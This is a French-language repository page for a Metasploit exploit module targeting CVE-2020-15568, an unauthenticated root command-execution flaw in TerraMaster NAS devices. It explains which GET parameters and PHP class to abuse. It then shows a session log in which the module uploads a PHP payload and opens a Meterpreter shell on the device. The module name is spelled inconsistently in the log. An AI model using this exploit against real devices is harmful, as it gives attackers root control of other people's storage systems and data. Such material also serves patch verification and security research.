
Dépôt pour le module Metasploit CVE-2020-15568
Dépôt pour le module Metasploit CVE-2020-15568
Une vulnérabilité d'invocation dynamique de méthode de classe existe dans le fichier include/exportUser.php, ce qui conduit à l'exécution de commandes à distance sur les appareils TerraMaster avec les privilèges root. Le fichier vulnérable nécessite que plusieurs paramètres HTTP GET soient fournis afin d'atteindre l'appel de méthode et d'exploiter cette vulnérabilité. À la première ligne, l'application inclut app.php qui charge automatiquement les classes de base pertinentes du logiciel TOS. L'application décide de l'opération en fonction de la valeur du paramètre GET type. Si la valeur de la variable type est différente de 1 ou 2, il est alors possible d'atteindre le code vulnérable. Dans le code source de exportUser.php, l'application exige les paramètres HTTP GET cla (abréviation de class), func et opt.
Lors de la revue de code d'autres fichiers également, il a été constaté qu'il existe un moyen d'exploiter ce problème avec des classes préexistantes du logiciel TOS. La classe PHP située dans include/class/application.class.php est la meilleure candidate pour exécuter des commandes sur les appareils qui exécutent le logiciel TOS. Étant donné que exportUser.php ne dispose d'aucun contrôle d'authentification, il est possible pour un attaquant non authentifié d'atteindre l'exécution de code
use exploit/multi/http/terramaster_command_execset rhost 192.168.1.27check[+] 192.168.1.27:80 - The target is vulnerable.
Exploit targets:
Id Name
-- ----
0 Auto
msf5 > use exploit/multi/http/terra_master_command_exec
msf5 exploit(exploit/multi/http/terramaster_command_exec) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 exploit(multi/http/terramaster_command_exec) > run
[+] Payload uploaded to /logs/FJETBHLL/.vatw.php
[+] Payload successfully triggered !
[*] Started bind TCP handler against 192.168.1.27:9090
[*] Sending stage (38288 bytes) to 192.168.1.27
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.27:9090) at 2020-07-23 09:49:34 +0300
meterpreter >